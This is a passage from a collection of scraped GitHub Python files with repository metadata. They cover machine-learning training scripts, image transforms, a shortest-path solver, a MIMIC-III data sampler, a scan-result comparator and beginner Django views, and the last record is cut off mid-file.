string=datetime.now().strftime(date_pattern)+' '+m['topic']+ m['spot']+'已签到'\n print(string)\n msg_send(string)\n else:\n try:\n raise NameError(\"cookie过期\")\n except NameError:\n msg_send('cookie过期')\n else:\n print('该会议室没有签到链接')\n else:\n print(datetime.now().strftime(date_pattern)+' '+m['topic']+'暂时不用签到')\n \n except Exception:\n msg_send('cookie过期')\n\n\nwhile True:\n job()\n time.sleep(300)","repo_name":"smqh-smqh/kwai","sub_path":"gits/signIn.py","file_name":"signIn.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6642636285","text":"# import the necessary packages\nfrom siameseConfig.siamese_network import build_siamese_model\nfrom siameseConfig import config\nfrom siameseConfig import utils\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.layers import Lambda\nfrom tensorflow.keras.datasets import mnist\nimport numpy as np\nimport tensorflow as tf\n\ntrain_ds = tf.keras.utils.image_dataset_from_directory(\n directory='/Users/alfredo/Desktop/Wellington/WellingtonV2/dataset/training_data',\n labels='inferred',\n image_size=(180, 180),\n color_mode= 'rgb')\n\n(trainX, trainY), (testX, testY) = train_ds\ntrainX = trainX / 255.0\ntestX = testX / 255.0\n# add a channel dimension to the images\ntrainX = np.expand_dims(trainX, axis=-1)\ntestX = np.expand_dims(testX, axis=-1)\n# prepare the positive and negative pairs\nprint(\"[INFO] preparing positive and negative pairs...\")\n(pairTrain, labelTrain) = utils.make_pairs(trainX, trainY)\n(pairTest, labelTest) = utils.make_pairs(testX, testY)\n\nprint(\"[INFO] building siamese network...\")\nimgA = Input(shape=config.IMG_SHAPE)\nimgB = Input(shape=config.IMG_SHAPE)\nfeatureExtractor = build_siamese_model(config.IMG_SHAPE)\nfeatsA = featureExtractor(imgA)\nfeatsB = featureExtractor(imgB)\n\ndistance = Lambda(utils.euclidean_distance)([featsA, featsB])\noutputs = Dense(1, activation=\"sigmoid\")(distance)\nmodel = Model(inputs=[imgA, imgB], outputs=outputs)\n\nprint(\"[INFO] compiling model...\")\nmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\",\n\tmetrics=[\"accuracy\"])\n\nprint(\"[INFO] training model...\")\nhistory = model.fit(\n\t[pairTrain[:, 0], pairTrain[:, 1]], labelTrain[:],\n\tvalidation_data=([pairTest[:, 0], pairTest[:, 1]], labelTest[:]),\n\tbatch_size=config.BATCH_SIZE, \n\tepochs=config.EPOCHS)\n\nprint(\"[INFO] saving siamese model...\")\nmodel.save(config.MODEL_PATH)\n# plot the training history\nprint(\"[INFO] plotting training history...\")\nutils.plot_training(history, config.PLOT_PATH)","repo_name":"Alfredomanjon/Wellington-Models","sub_path":"WellingtonV2/train_siamese_network.py","file_name":"train_siamese_network.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72236193120","text":"import time, os, sys\r\n\r\n#убираем записи о команде выключиться\r\nf = open('000.die', 'w')\r\nf.write('')\r\nf.close()\t\t\r\na = ''\r\n\r\nwhile a=='':\r\n\ttime.sleep(1)\r\n\tprint(0)\r\n\ttry:\r\n\t\t#пишем свой статус\r\n\t\tf = open('000.status', 'w')\r\n\t\tf.write('1')\r\n\t\tf.close()\t\t\r\n\texcept:\r\n\t\ta = 1\r\n\r\n\ttry: #проверяем нет ли команды прекратить\r\n\t\tf = open('000.die')\r\n\t\ta = f.read()\r\n\t\tf.close()\r\n\texcept:\r\n\t\ta = ''","repo_name":"Chegevarich/py_learn","sub_path":"cw_00/process/000.py","file_name":"000.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36798964607","text":"from tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.layers import Conv2D , MaxPooling2D, Flatten, Dense, Dropout, GlobalAveragePooling2D\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nimport matplotlib.pyplot as plt\n\nfrom glob import glob\n\nbatchSize = 32\nepochs = 200\n\nTRAINING_DIR = \"C:/Users/sscan/PycharmProjects/EE475Project/train\"\n\nNumOfClasses = len(glob(\"C:/Users/sscan/PycharmProjects/EE475Project/train/*\"))\n\nprint(NumOfClasses)\n\ntrain_datagen = ImageDataGenerator(rescale = 1/255.0,\n rotation_range = 30,\n zoom_range = 0.4,\n horizontal_flip=True,\n shear_range = 0.4)\n\ntrain_generator = train_datagen.flow_from_directory(TRAINING_DIR,\n batch_size=batchSize,\n class_mode= 'categorical',\n target_size=(190,190))\n\nVALIDATION_DIR = \"C:/Users/sscan/PycharmProjects/EE475Project/validation\"\nval_datagen = ImageDataGenerator(rescale = 1/255.0)\nval_generator = train_datagen.flow_from_directory(VALIDATION_DIR,\n batch_size=batchSize,\n class_mode= 'categorical',\n target_size=(190,190))\n\ncallBack = EarlyStopping(monitor='val_loss', patience = 5, verbose = 1, mode = 'auto')\n\nbestModelFilename = \"C:/Users/sscan/PycharmProjects/EE475Project/chess_best_model.h5\"\n\nbestModel = ModelCheckpoint(bestModelFilename, monitor = 'val_accuracy', verbose = 1, save_best_only = True)\n\n#MODEL\n\nmodel = Sequential([\n Conv2D(32,(3,3), activation = 'relu', input_shape=(None,None,3)),\n MaxPooling2D(2,2),\n\n Conv2D(64,(3,3), activation = 'relu'),\n MaxPooling2D(2,2),\n\n Conv2D(64,(3,3), activation = 'relu'),\n MaxPooling2D(2,2),\n\n Conv2D(128,(3,3), activation = 'relu'),\n MaxPooling2D(2,2),\n\n Conv2D(256,(3,3), activation = 'relu'),\n MaxPooling2D(2,2),\n\n GlobalAveragePooling2D(),\n\n Dense(512, activation='relu'),\n Dense(512, activation='relu'),\n\n Dense(NumOfClasses, activation = 'softmax')\n])\n\nprint(model.summary())\n\nmodel.compile(optimizer = 'Adam', loss = 'categorical_crossentropy', metrics=['accuracy'] )\n\nhistory = model.fit(train_generator,\n epochs =epochs,\n verbose = 1,\n validation_data = val_generator,\n callbacks = [bestModel])\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(len(acc))\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(epochs, acc , 'r', label = \"Train Accuracy\")\nplt.plot(epochs, val_acc, 'b', label = \"Validation Accuracy\")\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.show()\n\nfig = plt.figure(figsize=(14,7))\nplt.plot(epochs, loss , 'r', label = \"Train Loss\")\nplt.plot(epochs, val_loss, 'b', label = \"Validation Loss\")\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.show()\n\n\n","repo_name":"sscander17/Chess-position-detection-from-2d-images-using-CNN","sub_path":"BuildTheModel.py","file_name":"BuildTheModel.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8936724776","text":"import torch, torchvision\nimport torchvision.transforms.functional as F\n\nfrom PIL import Image, ImageOps\n\n\nclass Compose:\n \"\"\"\n Composes several transforms together.\n \"\"\"\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, image, bboxs):\n for t in self.transforms:\n image, bboxs = t(image, bboxs)\n return image, bboxs\n\n\nclass ToTensor:\n \"\"\"\n Converts a PIL Image or numpy.ndarray (H x W x C) to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0].\n Only applied to image, not bboxes.\n \"\"\"\n def __call__(self, image, bboxs):\n return F.to_tensor(image), bboxs\n \n \nclass Normalize(torch.nn.Module):\n \"\"\"\n Normalize a tensor image with mean and standard deviation.\n Only applied to image, not bboxes.\n \"\"\"\n def __init__(self, mean, std, inplace=False):\n super().__init__()\n self.mean = mean\n self.std = std\n self.inplace = inplace\n\n def forward(self, image, bboxs):\n return F.normalize(image, self.mean, self.std, self.inplace), bboxs\n \n \nclass Resize(torch.nn.Module):\n \"\"\"\n Resize the short side of image to given size.\n Assume the coords are given min_x, min_y, max_x, max_y.\n Both applied to image and bboxes.\n \"\"\"\n def __init__(self, min_size, max_size):\n super().__init__()\n self.min_size = min_size\n self.max_size = max_size\n\n def forward(self, image, bboxs):\n return resize(image, bboxs, self.min_size, self.max_size)\n \n \nclass Flip(torch.nn.Module):\n \"\"\"\n Apply horizontal flip on image and bboxes.\n Assume the coords are given min_x, min_y, max_x, max_y.\n Both applied to image and bboxes.\n \"\"\"\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, image, bboxs):\n if torch.rand(1) < self.p:\n flip_image = ImageOps.mirror(image)\n if bboxs == None:\n return flip_image, bboxs\n else:\n flip_bbox = flip(image, bboxs)\n return flip_image, flip_bbox\n else:\n return image, bboxs\n \n \ndef resize(img, bboxs, min_size, max_size):\n w, h = img.size\n min_side, max_side = min(w, h), max(w, h)\n \n ratio = min(min_size / min_side, max_size / max_side)\n resize_w, resize_h = int(ratio * w), int(ratio * h)\n ratio_w, ratio_h = resize_w / w, resize_h / h\n \n resize_img = img.resize((resize_w, resize_h), resample=Image.BILINEAR)\n resize_bboxs = bboxs.clone()\n if bboxs != None:\n resize_bboxs[:, 0::2] = bboxs[:, 0::2] * ratio_w\n resize_bboxs[:, 1::2] = bboxs[:, 1::2] * ratio_h\n return resize_img, resize_bboxs\n \n \ndef flip(img, bboxs):\n img = F.pil_to_tensor(img)\n _, h, w = img.shape\n\n flip_bboxs = []\n for bbox in bboxs:\n min_x, min_y, max_x, max_y = bbox\n flip_min_x, flip_max_x = w-min_x, w-max_x\n flip_bboxs.append(torch.FloatTensor([flip_max_x, min_y, flip_min_x, max_y]))\n return torch.stack(flip_bboxs)","repo_name":"Jasonlee1995/Faster_RCNN","sub_path":"augmentation.py","file_name":"augmentation.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"72117460642","text":"class MsgDelta:\n def __init__(self):\n self.elevator = 0.0 # elevator\n self.aileron = 0.0 # aileron\n self.rudder = 0.0 # rudder\n self.throttle_right = 0.0 # throttle for right motor \n self.throttle_left = 0.0 # throttle for left motor\n self.throttle_rear = 0.0 # throttle for back motor\n self.motor_right = 0.0 # right motor commanded angle\n self.motor_left = 0.0 # left motor commanded angle\n # self.elevon_right = 0.0 # right elevon angle in radians\n # self.elevon_left = 0.0 # left elevon in radians\n # # need to be able to command left and right motor angles\n # self.servo_right = 0.0 # commanded right servo angle in radians\n # self.servo_left = 0.0 # commanded left servo angle in radians\n\n\n","repo_name":"byu-magicc/vtolsim","sub_path":"message_types/msg_delta.py","file_name":"msg_delta.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42019022593","text":"import cv2\n\nsrc = cv2.imread(\"../images/cat.jpg\", cv2.IMREAD_COLOR)\ndst = cv2.resize(src, dsize=(800, 600), interpolation=cv2.INTER_LINEAR) # 이미지 확대시\ndst2 = cv2.resize(src, dsize=(0, 0), fx=0.3, fy=0.7, interpolation=cv2.INTER_AREA) # 이미지 축소시\n\ncv2.imshow(\"src\", src)\ncv2.imshow(\"dst\", dst)\ncv2.imshow(\"dst2\", dst2)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"projectjh/aischool","sub_path":"AI/04.DeepLearning/OpenCV/20221024/11_resize.py","file_name":"11_resize.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7286955782","text":"# -*- coding:UTF-8 -*-\nimport Tkinter\nimport tkMessageBox #对话框\nimport urllib,urllib2,re\nfrom PIL import Image\n\n\n\nwindow = Tkinter.Tk() #创建窗口\nwindow.title(\"Test GUI\")\nwindow.geometry(\"800x200\")\nname=Tkinter.Label(window,text = \"姓名:\",font=(\"微软雅黑\",40),fg = \"red\") #文本框\nname.grid() #grid是一个布局方法,place和\nnameent = Tkinter.Entry(window,font =(\"微软雅黑\",40)) #单行输入框,多行为\nnameent.grid(row=0,column=1) #设置位置\nbutton= Tkinter.Button(window,text =\"一键设置签名\",font =(\"微软雅黑\",10),width=\"15\",height=\"1\")\nbutton.grid(row=1,column=1) #设置button位置\n\nwindow.mainloop() #运行窗口\n\n","repo_name":"oldwai/windows_tianlang_pycharm","sub_path":"Pycharm_py/Py_GUI/signature.py","file_name":"signature.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"74389274082","text":"\nN, M, C = list(map(int, input().split()))\nprint(f\"N: {N}, M: {M}, C: {C}\")\n\nINF = int(10e9)\n# for save the distance\nd = [INF] * (N+1)\n\n# for saving adj node\nfrom collections import defaultdict\ngraph = defaultdict(list)\n\nfor _ in range(M):\n X, Y, Z = list(map(int, input().split()))\n graph[X].append((Y, Z))\n\n# start solving problem\nfrom heapq import heappush, heappop\n\nheap = []\nd[C] = 0\nheappush(heap, (0, C))\n\nwhile heap:\n dist, now = heappop(heap)\n\n if d[now] < dist:\n continue\n\n for nb, time in graph[now]:\n cost = dist + time\n\n if cost < d[nb]:\n d[nb] = cost\n heappush(heap, (cost, nb))\n\n# count the result\ncount = 0\nmax_distance = 0\n\nfor i in range(N+1):\n if d[i] != INF and i != C:\n count += 1\n max_distance = max(max_distance, d[i])\n\nprint(count, max_distance)\n\n\n\n\n\n\n","repo_name":"OnePercentMagic/ProblemSolvingProject","sub_path":"shortest_path/telecommunication.py","file_name":"telecommunication.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21066015475","text":"import os\nimport pandas as pd\nfrom sklearn.utils.random import sample_without_replacement\n\n########################################################################################################################\n# MIMIC III DATASET SUB-SAMPLER\n########################################################################################################################\n\nRAND_SEED = 62368\nSAMPLE_SIZE = 10_000\nMIMIC_III_PATH = './MIMIC III/'\nDATA_SUBSET_PATH = './M3_Subset/'\n\nos.chdir('/') # NOTE Set to correct project directory\n\nassert os.path.isdir(MIMIC_III_PATH), f\"{MIMIC_III_PATH} directory is missing\"\nassert os.path.isfile(MIMIC_III_PATH + 'ICUSTAYS.csv'), \"ICUSTAYS.csv file is missing\"\nassert os.path.isfile(MIMIC_III_PATH + 'CHARTEVENTS.csv'), \"CHARTEVENTS.csv file is missing\"\n\nif not os.path.isdir(DATA_SUBSET_PATH):\n os.mkdir(DATA_SUBSET_PATH)\n\n# STEP 1: RANDOMLY SAMPLE INDICES FROM ICUSTAYS\n\n\ndef lower_columns(df):\n df_cols = list(df)\n df_cols_lowercase = [col_name.lower() for col_name in df_cols]\n cols_dict = dict(zip(df_cols, df_cols_lowercase))\n\n df.rename(columns=cols_dict, inplace=True)\n\n\nicu_stays = pd.read_csv(MIMIC_III_PATH + 'ICUSTAYS.csv', header=0, parse_dates=['INTIME', 'OUTTIME'])\nlower_columns(icu_stays)\n\nsubset_idx = sample_without_replacement(icu_stays.shape[0], SAMPLE_SIZE, random_state=RAND_SEED)\n\n# STEP 2: SUB-SAMPLE ICUSTAYS.CSV\n\nicu_stays = icu_stays.loc[subset_idx]\nicu_stays.to_csv(DATA_SUBSET_PATH + 'ICUSTAYS.csv', mode='w')\n\n# STEP 3: SUB-SAMPLE CHARTEVENTS.CSV\n\nCHUNK_SIZE = 10000000\nCHART_EVENT_COLS = ['ROW_ID', 'SUBJECT_ID', 'HADM_ID', 'ICUSTAY_ID', 'ITEMID', 'CHARTTIME', 'VALUENUM']\n\nif os.path.isfile(DATA_SUBSET_PATH + 'CHARTEVENTS.csv'):\n os.remove(DATA_SUBSET_PATH + 'CHARTEVENTS.csv')\n\nwith pd.read_csv(MIMIC_III_PATH + 'CHARTEVENTS.csv', usecols=CHART_EVENT_COLS, parse_dates=['CHARTTIME'], chunksize=CHUNK_SIZE) as reader:\n for i, chunk in enumerate(reader):\n lower_columns(chunk)\n chunk = chunk.loc[chunk['icustay_id'].isin(icu_stays['icustay_id'])]\n header = True if i == 0 else None\n\n chunk.to_csv(DATA_SUBSET_PATH + 'CHARTEVENTS.csv', header=header, mode='a')\n\n# STEP 4: (OPTIONAL) LOWERCASE COLUMNS FOR REMAINING FILES\n\nALL_FILES_LOWER_COLUMNS = True\nOTHER_FILES = ['PATIENTS.csv', 'DIAGNOSES_ICD.csv', 'D_ITEMS.csv']\n\nif ALL_FILES_LOWER_COLUMNS:\n for filename in OTHER_FILES:\n df = None\n\n if filename == 'PATIENTS.csv':\n df = pd.read_csv(MIMIC_III_PATH + filename, header=0, parse_dates=['DOB', 'DOD', 'DOD_HOSP', 'DOD_SSN'])\n else:\n df = pd.read_csv(MIMIC_III_PATH + filename, header=0)\n\n lower_columns(df)\n df.to_csv(DATA_SUBSET_PATH + filename, mode='w')\n","repo_name":"karlvosatka/lstm-cnn-mimic-3","sub_path":"data_sampling/datasampler.py","file_name":"datasampler.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"501530371","text":"from django.core import checks\n\n\ndef check_all_index_strategies_current(app_configs, **kwargs):\n from share.search import IndexStrategy\n from share.search.exceptions import IndexStrategyError\n errors = []\n for index_strategy in IndexStrategy.all_strategies():\n try:\n index_strategy.assert_strategy_is_current()\n except IndexStrategyError as exception:\n errors.append(\n checks.Error(\n 'IndexStrategy changed without checksum confirmation!',\n hint=str(exception),\n obj=index_strategy,\n id='share.search.E001',\n )\n )\n return errors\n","repo_name":"CenterForOpenScience/SHARE","sub_path":"share/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"54"} +{"seq_id":"2452517435","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nfrom subprocess import check_output\nprint(check_output([\"ls\", \"../input\"]).decode(\"utf8\"))\n\n# Any results you write to the current directory are saved as output.\n\n\nimport cv2\nimport os, gc, sys, glob\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom sklearn import model_selection\nfrom sklearn import metrics\n\n\nimport keras\nfrom keras import optimizers\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.metrics import categorical_accuracy\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_set = pd.read_csv('../input/train_labels.csv')\ntest_set = pd.read_csv('../input/sample_submission.csv')\n\ndef read_img(img_path):\n img = cv2.imread(img_path)\n img = cv2.resize(img, (128, 128))\n return img\n\ntrain_img, test_img = [], []\nfor img_path in tqdm(train_set['name'].iloc[: ]):\n train_img.append(read_img('../input/train/' + str(img_path) + '.jpg'))\nfor img_path in tqdm(test_set['name'].iloc[: ]):\n test_img.append(read_img('../input/test/' + str(img_path) + '.jpg'))\n\ntrain_img = np.array(train_img, np.float32) / 255\ntrain_label = np.array(train_set['invasive'].iloc[: ])\ntest_img = np.array(test_img, np.float32) / 255\n\ndef model_nn():\n model = Sequential()\n model.add(Conv2D(16, (3, 3), activation='relu', input_shape=(128, 128, 3)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(32, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(128, (3, 3), activation='relu'))\n model.add(Flatten())\n model.add(Dense(2048, activation='relu'))\n model.add(Dropout(0.65))\n model.add(Dense(512, activation='relu'))\n model.add(Dropout(0.55))\n model.add(Dense(1, activation='sigmoid'))\n sgd = optimizers.SGD(lr = 0.001, decay = 1e-6, momentum = 0.8, nesterov = True)\n model.compile(loss = 'binary_crossentropy', optimizer = sgd, metrics=['accuracy'])\n print(model.summary())\n return model\n\nn_fold = 8\nkf = model_selection.KFold(n_splits = n_fold, shuffle = True)\neval_fun = metrics.roc_auc_score\n\ndef run_oof(tr_x, tr_y, te_x, kf):\n preds_train = np.zeros(len(tr_x), dtype = np.float)\n preds_test = np.zeros(len(te_x), dtype = np.float)\n train_loss = []; test_loss = []\n\n i = 1\n for train_index, test_index in kf.split(tr_x):\n x_tr = tr_x[train_index]; x_te = tr_x[test_index]\n y_tr = tr_y[train_index]; y_te = tr_y[test_index]\n\n datagen = ImageDataGenerator(\n # featurewise_center = True,\n rotation_range = 30,\n width_shift_range = 0.2,\n height_shift_range = 0.2,\n # zca_whitening = True,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True,\n vertical_flip = True,\n fill_mode = 'nearest')\n datagen.fit(x_tr)\n\n model = model_nn()\n earlystop = keras.callbacks.EarlyStopping(monitor='val_loss', patience = 15, verbose=0, mode='auto')\n model.fit_generator(datagen.flow(x_tr, y_tr, batch_size = 64),\n validation_data = (x_te, y_te), callbacks = [earlystop],\n steps_per_epoch = len(train_img) / 64, epochs = 1000, verbose = 2)\n\n train_loss.append(eval_fun(y_tr, model.predict(x_tr)[:, 0]))\n test_loss.append(eval_fun(y_te, model.predict(x_te)[:, 0]))\n\n preds_train[test_index] = model.predict(x_te)[:, 0]\n preds_test += model.predict(te_x)[:, 0]\n\n print('{0}: Train {1:0.5f} Val {2:0.5f}'.format(i, train_loss[-1], test_loss[-1]))\n i += 1\n\n print('Train: ', train_loss)\n print('Val: ', test_loss)\n print('Train{0:0.5f}_Test{1:0.5f}\\n\\n'.format(np.mean(train_loss), np.mean(test_loss)))\n preds_test /= n_fold\n return preds_train, preds_test\n\ntrain_pred, test_pred = run_oof(train_img, train_label, test_img, kf)\n\ntest_set['invasive'] = test_pred\ntest_set.to_csv('./submit.csv', index = None)","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/invasive-species-monitoring/MaXXX/naive-bagging-cnn-pb0-985.py","file_name":"naive-bagging-cnn-pb0-985.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"34331451885","text":"from analyzer.comparators.comparator_interface import ComparatorABC\nimport dictdiffer\n\n\nclass WhatWebComparator(ComparatorABC):\n def compare(self, data_to_compare_list=list, result_list=list):\n difference = ''\n for diff in list(dictdiffer.diff(data_to_compare_list, result_list)):\n action = diff[0]\n name = ''\n changes = ''\n\n if action == 'change':\n action = 'Scanned data has changed:'\n if isinstance(diff[1], str):\n name = diff[1]\n else:\n for i in diff[1]:\n name += str(i) + '-'\n name = name[:-1]\n\n changes = \": \" + str(diff[2][0]) + \" -> \" + str(diff[2][1])\n\n if action == 'add':\n action = 'Added to scanned data:'\n name = diff[1]\n\n for change in diff[2]:\n changes += '\\n' + str(change)\n\n if action == 'remove':\n action = 'Removed from scanned data:'\n name = diff[1]\n\n for change in diff[2]:\n changes += '\\n' + str(change)\n\n difference += action + ' ' + str(name) + ' ' + changes\n difference += '\\n\\n'\n\n if difference == '':\n difference = 'None'\n\n return difference\n","repo_name":"s3m3n1s/webchch","sub_path":"analyzer/comparators/whatweb_comparator.py","file_name":"whatweb_comparator.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38369539945","text":"import numpy as np\nfrom log import log\nimport pandas as pd\n\nclass ParamSearch:\n def __init__(self, learner, params):\n self.learner = learner\n self.params = params\n self.history = []\n self.best_params = None\n self.final_learner = None\n\n def search(self, X_train, y_train, iterations):\n log(\"Searching for params...\")\n log(\"\")\n self.history = []\n self.best_params = None\n\n for _ in range(iterations):\n selected_params = {}\n for key in self.params:\n selected_value = self.params[key]\n selected_params[key] = np.random.choice(selected_value, 1)[0]\n\n splits = np.array_split(X_train.join(y_train, sort=False), 5)\n validation_scores = []\n for i in range(5):\n train = splits.copy()\n validation = splits[i]\n del train[i]\n train = pd.concat(train, sort=False)\n\n y_cross = train[\"label\"]\n X_cross = train.drop(columns=\"label\")\n y_cross_val = validation[\"label\"]\n X_cross_val = validation.drop(columns=\"label\")\n\n learner = self.learner(**selected_params)\n learner.fit(X_cross, y_cross)\n validation_score = learner.score(X_cross_val, y_cross_val)\n validation_scores.append(validation_score)\n\n final_validation_score = sum(validation_scores) / 5\n self.history.append((selected_params, final_validation_score))\n\n log(f\"Params: {selected_params}\")\n log(f\"5-fold Validation score: {final_validation_score}\")\n log(\"\")\n\n def find_best(self):\n best_history = sorted(self.history, key=lambda x: x[1], reverse=True)[0]\n log(f\"Best params: {best_history[0]}\")\n log(f\"Best 5-fold validation score: {best_history[1]}\")\n log(\"\")\n\n self.best_params = best_history[0]\n\n def fit(self, X, y):\n self.final_learner = self.learner(**self.best_params)\n self.final_learner.fit(X, y)\n\n def score(self, X, y):\n return self.final_learner.score(X, y)\n\n \n\n\n","repo_name":"mathiasoldfarm/boosting-bagging","sub_path":"param_search.py","file_name":"param_search.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24919023525","text":"from django.shortcuts import render, HttpResponse, redirect\r\nfrom backend.models import Article\r\nfrom django.db.models import Q\r\nfrom backend.forms import FormArticle\r\nfrom django.contrib import messages\r\n\r\n# Create your views here.\r\nlayout = \"\"\" \r\n

Sitio web con django | Orlin Diaz Diaz

\r\n
\r\n \r\n
\r\n \"\"\"\r\n\r\ndef inicio(request):\r\n return HttpResponse(layout)\r\n \r\n\r\ndef holamundo(request):\r\n return render(request, 'holamundo.html')\r\n\r\ndef pagina(request, redirigir=0):\r\n \r\n if redirigir == 1: \r\n return redirect('/nombreApellido/', nombre=\"Orlin\", apellidos=\"Diaz\")\r\n \r\n return HttpResponse(layout+\"cargando paginas de las vistas\")\r\n\r\n\r\n\r\ndef inicioyear(request):\r\n '''\r\n html = \"\"\"\r\n
    \r\n \"\"\"\r\n year = 2023\r\n \r\n while year <= 2050:\r\n if year % 2 == 0:\r\n html += f\"
  • {str(year)}\"\r\n year += 1\r\n html += \"
      \" '''\r\n \r\n year = 2023\r\n hasta = range(year, 2051)\r\n \r\n return render(request, 'index.html', {\r\n 'years': hasta\r\n })\r\n\r\ndef nombreApellidos(request):\r\n nombre = \"Orlin de los santos\"\r\n apellidos = \"Diaz Diaz\"\r\n \r\n nombre_completo = f\"{nombre} {apellidos}\"\r\n \r\n lenguajes = ['Javascirpt', 'Reac.js', 'Node.js', 'Python', 'Tkinter', 'Django']\r\n \r\n return render(request, 'index.html', {\r\n \"mi_variable\": \"Soy una vista mostrada en la template de django\",\r\n \"nombre\": nombre_completo,\r\n \"lenguajes\": lenguajes\r\n })\r\n\r\n\r\ndef prueba(request):\r\n return render(request, 'pagina.html', {\r\n 'texto': \"\",\r\n \"lista\": ['uno', 'dos', 'tres']\r\n })\r\n\r\ndef contacto(request, nombre=\"\", apellidos=\"\", edad=\"\"):\r\n html = \"\"\r\n \r\n if nombre and apellidos and edad:\r\n html = \"El nombre completo es:\"\r\n html = f\"{nombre} {apellidos} {edad}\"\r\n \r\n return HttpResponse(layout+f\"

      Contacto {nombre} {apellidos} {edad}

      \"+html)\r\n\r\n#creando los articulos y guardando en la base de datos\r\ndef crear_articulo(request, title, content, public):\r\n articulo = Article(\r\n title = title,\r\n content = content,\r\n public = public\r\n )\r\n \r\n articulo.save()\r\n \r\n return HttpResponse(f'Articulo Creado: {articulo.title} {articulo.content} {articulo.public}')\r\n\r\ndef save_articulo(request):\r\n if request.method == \"POST\":\r\n \r\n title = request.POST['title']\r\n \r\n if len(title) <= 5:\r\n return HttpResponse(f'El titulo es muy pequeno')\r\n \r\n content = request.POST['content']\r\n public = request.POST['public']\r\n \r\n articulo = Article(\r\n title = title,\r\n content = content,\r\n public = public\r\n )\r\n \r\n articulo.save()\r\n return HttpResponse(f'Articulo guardado: {articulo.title} {articulo.content} {articulo.public}')\r\n \r\n else:\r\n return HttpResponse(f'

      No se ha podido crear el articulo...

      ')\r\n \r\ndef create_article(request):\r\n \r\n return render(request, 'create-article.html')\r\n\r\n#(mostrar/obtener) los articulos\r\ndef articulo(request):\r\n \r\n try:\r\n articulo = Article.objects.get(pk=9, public=False)\r\n response = f'

      Articulo: {articulo.id}. {articulo.title} {articulo.content}

      '\r\n except:\r\n response = \"

      Articulo no encontrado

